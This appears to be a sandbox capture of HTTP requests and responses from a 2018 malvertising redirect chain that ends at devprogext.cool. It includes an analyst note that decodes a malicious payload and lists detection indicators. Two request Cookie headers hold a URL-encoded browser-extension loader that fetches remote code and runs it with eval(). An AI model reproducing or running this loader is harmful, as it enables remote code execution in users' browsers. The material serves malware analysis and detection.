Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Thu, 16 Aug 2018 10:51:21 GMT
Etag: 6EFF1C68C412A7BEBF0A275E9866EFCF155599D9
X-OCSP-Responder-ID: rmdccaocsp24
Content-Length: 314
Cache-Control: public, no-transform, must-revalidate, max-age=204527
Expires: Thu, 23 Aug 2018 10:41:38 GMT
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   314
Md5:    7f3eb520f9bcd1d63db61354064d4e0d
Sha1:   6eff1c68c412a7bebf0a275e9866efcf155599d9
Sha256: 80503eadfd7bfd0780bb2dafbc78e587a18281c0745fa7784fb858ba90ef47cc
                                        
                                            GET /Ky0vu0/?source=1938926&external_id=55586495074930688&cost=0.15 HTTP/1.1 
Host: briefext.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cobalten.com/afu.php?zoneid=1938926

                                         
                                         104.24.109.18
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d7dd29d3f6be9b61918d77247b527221c1534816371; expires=Wed, 21-Aug-19 01:52:51 GMT; path=/; domain=.briefext.com; HttpOnly _token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiXCJ1dWlkXzM4NjQwZmYxYWo2M2JlYWFjM3EzXzM4NjQwZmYxYWo2M2JlYWFjM3EzNWI3YjcwNzM5Nzc1MzQuMTk5OTk2MDhcIiJ9.Mvkw_qzyq0LjN6SkX3MFBreeS3mqTpUzgX3gbhJvTSA; expires=Fri, 21-Sep-2018 01:52:51 GMT; Max-Age=2678400; path=/; domain=.briefext.com 5e9ed=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjc5MlwiOjE1MzQ4MTYzNzF9LFwiY2FtcGFpZ25zXCI6e1wiNTQ2XCI6MTUzNDgxNjM3MX0sXCJ0aW1lXCI6MTUzNDgxNjM3MX0ifQ.6nVv5CTdgXuvsUmcgcQLq1shP8sVbSq46yV_YJDz4t0; expires=Fri, 21-Sep-2018 01:52:51 GMT; Max-Age=2678400; path=/; domain=.briefext.com
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Tue, 21 Aug 2018 01:52:51 GMT
Cache-Control: max-age=0
Pragma: no-cache
Location: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 44d976718911427f-OSL


--- Additional Info ---
                                        
                                            GET /3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608 HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; expires=Wed, 21-Aug-19 01:52:51 GMT; path=/; domain=.devprogext.cool; HttpOnly shl=1; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; expires=Tue, 21-Aug-2018 02:52:51 GMT; Max-Age=3600; path=/ t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; expires=Tue, 21-Aug-2018 01:58:51 GMT; Max-Age=360; path=/ s=38640ff1aj63beaac3q3; expires=Tue, 21-Aug-2018 01:58:51 GMT; Max-Age=360; path=/
Server: cloudflare
CF-RAY: 44d9767301e742b5-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   17895
Md5:    2c5189736f159971b8a77da2b1b5beb8
Sha1:   3116aa55728359c59b8fb81c414c023689ba2223
Sha256: d9f3d57fc7c3edd3ab9acd6e7bfb6532a34527e3656575732ab93ee81bf0f3a2
                                        
                                            GET /2/lib/jquery.min.js HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-1538f"
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d28b429d-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   34106
Md5:    bf13a6b8435f80e19d7827f205845b59
Sha1:   44dbd2aadc6e3ad655f88d469ad53268443bf781
Sha256: ddc9353b24962d31baeffabe4aa408e001f282ab19d15b2e887a0243fdf358d0
                                        
                                            GET /2/lib/arrow__up.png HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Content-Length: 33223
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: "5b7adb53-81c7"
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 44d97673d1f142b5-OSL


--- Additional Info ---
Magic:  PNG image, 450 x 592, 8-bit/color RGBA, non-interlaced
Size:   33223
Md5:    d806d5f73b4b7ca093a0ad79f47bf0c8
Sha1:   4cdadce2fe96281196aafd62cb41ea85aa8a54fd
Sha256: 4399fd13a2b71e3f70846fd5de33d293ecbba9d870115a1fdef53b3a142b62fb
                                        
                                            GET /2/lib/animate.min.css HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-ce35"
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d1534267-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4905
Md5:    0f44ef1d2c147d564d9ef16bbefad60a
Sha1:   a3a1bf29b825fb57312df6c25d7996c815248b72
Sha256: 5f288dd57347fe41527a3b31946b24a1848d65f27a8176a87ef47f338865c8b3
                                        
                                            GET /2/lib/reset.min.css HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-305"
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d17d4261-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   437
Md5:    5bcd6972d9d527b258da74330a836f31
Sha1:   268a327846e2e0b8d110d5b83354da22325d9699
Sha256: ea060493ab5804231dfc39a9b7df66db644c47a79b6d4081bed18aee55367743
                                        
                                            GET /2/lib/screenfull.min.js HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-7e2"
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d17b4261-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   826
Md5:    703e057d4fb9a5734ac86ebb0c766173
Sha1:   adf979ae3c8b97403e30a7a65f86d19551e68fe2
Sha256: 8d0f4c51822352ec6e3a413a4e3f0458de1df37aa8c6e19ad78966a5efc3bcaa
                                        
                                            GET /ff/installlistener/ HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
CF-RAY: 44d9767461f742b5-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   951
Md5:    dad585109822d6ea0e216669ff707dde
Sha1:   f99a1ead98ca5c7782dedcf71de2a4fcc4e357c5
Sha256: f387a7b2b71fe0253d5a9b9b434dffdf2057fca3e70f8b4e748b55a927492919
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 116
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Mon, 20 Aug 2018 17:06:50 GMT
Etag: 010F527D4DD547C88A74760EFEAB8BC540232E28
X-OCSP-Responder-ID: rmdccaocsp27
Content-Length: 279
Cache-Control: public, no-transform, must-revalidate, max-age=572646
Expires: Mon, 27 Aug 2018 16:56:57 GMT
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   279
Md5:    372d8ab741d83e7491307cf9b5003ffa
Sha1:   010f527d4dd547c88a74760efeab8bc540232e28
Sha256: 89d78aad6b1351d3e7120d8ea5e5e4c5f87413efd7fe8259410d1c36c9760b5a
                                        
                                            GET /js/ktr.js HTTP/1.1 
Host: bronewlook.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608

                                         
                                         104.31.80.131
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Date: Tue, 21 Aug 2018 01:52:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dac8ffa87152885c2b60044244f78dc551534816372; expires=Wed, 21-Aug-19 01:52:52 GMT; path=/; domain=.bronewlook.com; HttpOnly
Last-Modified: Wed, 29 Nov 2017 12:33:42 GMT
Etag: W/"5a1ea926-1fa0"
Expires: Fri, 31 Aug 2018 01:52:52 GMT
Cache-Control: public, max-age=864000
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 44d976753a084297-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2357
Md5:    ea1103427236b93e93f4f6328b8e0aa5
Sha1:   f398427c28ca28dba93f9d05fdbf03a3e5a420f2
Sha256: 7b53e28ee69dd8b82f321fda12f7ad6ede91fde7170d72b6e7e5f07257ed79d5
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3; 1bf31c02-3bc4-4df8-b046-0c8dd6f3b6de=%28function%28%29%20%7B%09function%20sendStart%28%29%20%7B%09%09var%20t%20%3D%20new%20XMLHttpRequest%3B%09%09t.onreadystatechange%20%3D%20function%28%29%20%7B%09%09%09browser.storage.local.set%28%7B%09%09%09%09start%3A%201%09%09%09%7D%29%3B%09%09%7D%2C%20t.open%28%22GET%22%2C%20%22http%3A//devprogext.cool/%3Fevent%3Dstart%22%2C%20%210%29%2C%20t.send%28%29%09%7D%20%20%20%20sendR%28%29%3B%09function%20sendR%28%29%20%7B%09%09var%20c%20%3D%20new%20XMLHttpRequest%3B%09%09c.open%28%22GET%22%2C%20getURl%28%29%29%3B%09%09c.onload%20%3D%20function%28%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20sendStart%28%29%3B%09%09%09if%20%28200%20%3D%3D%20c.status%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20i%20%3D%20c.responseText%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09id%3A%20i%09%09%09%09%7D%29%3B%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09t%3A%20new%20Date%28%29.getTime%28%29%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20browser.tabs.executeScript%28%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20code%3A%20%22window.location.hash%3D%60devprogext.cool%60%22%2C%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20allFrames%3A%20true%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29.then%28%28%29%20%3D%3E%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20eval%28i%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%7D%20else%20%7B%09%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09%09sendR%28%29%3B%09%09%09%09
%7D%2C%20600000%29%3B%09%09%09%7D%09%09%7D%3B%09%09c.onerror%20%3D%20function%28%29%20%7B%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09sendR%28%29%3B%09%09%09%7D%2C%20600000%29%3B%09%09%7D%3B%09%09c.send%28%29%20%20%20%20%7D%20%20%20%09function%20getURl%28%29%20%7B%09%09return%20%22http%3A//devprogext.cool/ff/load/%22%3B%09%7D%7D%29.call%28this%29%3B

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: EXPIRED
Vary: Accept-Encoding
Expires: Tue, 28 Aug 2018 01:52:52 GMT
Cache-Control: public, max-age=604800
Server: cloudflare
CF-RAY: 44d9767542a0429d-OSL
Content-Encoding: gzip


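--- Additional Info ---
Analyst note: the Cookie header of the request above (repeated in the next /favicon.ico request to the same host) includes a cookie named 1bf31c02-3bc4-4df8-b046-0c8dd6f3b6de whose value URL-decodes to JavaScript source, not an identifier. As decoded, the script requests http://devprogext.cool/ff/load/, stores the response text via browser.storage.local.set, and passes that same text to eval() once a browser.tabs.executeScript call resolves; on a non-200 status or a request error it retries after 600000 ms, and it also requests http://devprogext.cool/?event=start. browser.storage and browser.tabs are WebExtension APIs, so the script appears intended for a browser-extension context rather than an ordinary page (inferred from the API names; the capture does not show it running). No Set-Cookie header for this cookie appears in the visible responses, so it was presumably set by page script. For detection, the host together with the /ff/installlistener/, /ff/load/ and ?event=start paths are the indicators visible in this capture. The hashes below describe the /favicon.ico response body, not the cookie value.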
Magic:  gzip compressed data, from Unix
Size:   10684
Md5:    cfac705015b3a22efc085375637ebced
Sha1:   34d7123748b246c12705d766cfacb2c3157a6261
Sha256: 25b8d2fa20a6ed8f3c6278bd4a723a311e6b738bae4e7378266fabef3a06b9c2
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3; 1bf31c02-3bc4-4df8-b046-0c8dd6f3b6de=%28function%28%29%20%7B%09function%20sendStart%28%29%20%7B%09%09var%20t%20%3D%20new%20XMLHttpRequest%3B%09%09t.onreadystatechange%20%3D%20function%28%29%20%7B%09%09%09browser.storage.local.set%28%7B%09%09%09%09start%3A%201%09%09%09%7D%29%3B%09%09%7D%2C%20t.open%28%22GET%22%2C%20%22http%3A//devprogext.cool/%3Fevent%3Dstart%22%2C%20%210%29%2C%20t.send%28%29%09%7D%20%20%20%20sendR%28%29%3B%09function%20sendR%28%29%20%7B%09%09var%20c%20%3D%20new%20XMLHttpRequest%3B%09%09c.open%28%22GET%22%2C%20getURl%28%29%29%3B%09%09c.onload%20%3D%20function%28%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20sendStart%28%29%3B%09%09%09if%20%28200%20%3D%3D%20c.status%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20i%20%3D%20c.responseText%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09id%3A%20i%09%09%09%09%7D%29%3B%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09t%3A%20new%20Date%28%29.getTime%28%29%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20browser.tabs.executeScript%28%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20code%3A%20%22window.location.hash%3D%60devprogext.cool%60%22%2C%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20allFrames%3A%20true%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29.then%28%28%29%20%3D%3E%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20eval%28i%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%7D%20else%20%7B%09%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09%09sendR%28%29%3B%09%09%09%09
%7D%2C%20600000%29%3B%09%09%09%7D%09%09%7D%3B%09%09c.onerror%20%3D%20function%28%29%20%7B%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09sendR%28%29%3B%09%09%09%7D%2C%20600000%29%3B%09%09%7D%3B%09%09c.send%28%29%20%20%20%20%7D%20%20%20%09function%20getURl%28%29%20%7B%09%09return%20%22http%3A//devprogext.cool/ff/load/%22%3B%09%7D%7D%29.call%28this%29%3B

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 28 Aug 2018 01:52:54 GMT
Cache-Control: public, max-age=604800
Server: cloudflare
CF-RAY: 44d97681929742b5-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10684
Md5:    cfac705015b3a22efc085375637ebced
Sha1:   34d7123748b246c12705d766cfacb2c3157a6261
Sha256: 25b8d2fa20a6ed8f3c6278bd4a723a311e6b738bae4e7378266fabef3a06b9c2
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
